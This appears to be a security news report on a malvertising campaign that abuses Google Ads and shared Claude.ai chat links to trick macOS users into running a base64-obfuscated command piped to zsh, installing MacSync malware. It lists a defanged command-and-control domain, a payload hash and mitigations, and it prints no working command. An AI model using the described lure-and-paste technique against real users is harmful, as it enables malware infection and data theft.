A sophisticated malvertising campaign is actively targeting macOS users by weaponizing Google Ads and legitimate Anthropic Claude shared chat links to distribute a variant of the MacSync malware.
Security researcher Berk Albayrak uncovered the novel attack chain on May 10, 2025, revealing how threat actors are exploiting trusted AI platforms to lend credibility to social engineering lures disguised as official software installation guides.
The infection begins when a developer or macOS user searches for terms such as “Claude download Mac.” Attackers intercept these queries through malicious Google Ads, redirecting victims to a convincing but fraudulent landing page.
MacSync Malware Hits macOS
To establish false legitimacy, the threat actors host their deceptive installation instructions through a publicly shared Claude.ai chat link effectively turning Anthropic’s own enterprise infrastructure into a delivery mechanism that bypasses traditional web content filters.
The campaign specifically targets developers seeking to integrate Claude AI into local macOS environments, a demographic likely to follow technical installation steps without suspicion.
Once on the landing page, victims are instructed to copy and paste a terminal command to complete the supposed software installation.
This command leverages base64 encoding to conceal the true destination URL, piping the maliciously downloaded content directly into the macOS Z shell (zsh) for immediate, fileless-style execution a technique consistent with the ClickFix social engineering method increasingly observed across multiple threat campaigns.
Upon successful execution, the system downloads a variant of MacSync malware, a family known for its persistence mechanisms and capability to compromise macOS environments for further exploitation and data collection.
Albayrak’s analysis identified the primary command-and-control (C2) infrastructure hosted on the domain customroofingcontractors[.]com. The payload has been identified by the following SHA-256 hash:
bbd98170ea66c8d13605cb88ad0e18602ef40c0745f7b2c979a8a342a31c1857
Security teams should immediately block this C2 domain and scan endpoints for the identified payload hash to assess potential exposure.
Mitigation
Organizations and macOS users should enforce strict policies against pasting terminal commands sourced from the internet, even when instructions appear to originate from trusted or recognizable domains.
Users must verify software downloads by navigating directly to official vendor websites rather than clicking sponsored search results.
Security teams should deploy endpoint detection solutions capable of flagging anomalous zsh executions and investigating suspicious base64-decoded commands in real time.
Proactively blocking the identified C2 infrastructure will help prevent successful payload delivery and post-infection activity across managed macOS environments.
No Comment! Be the first one.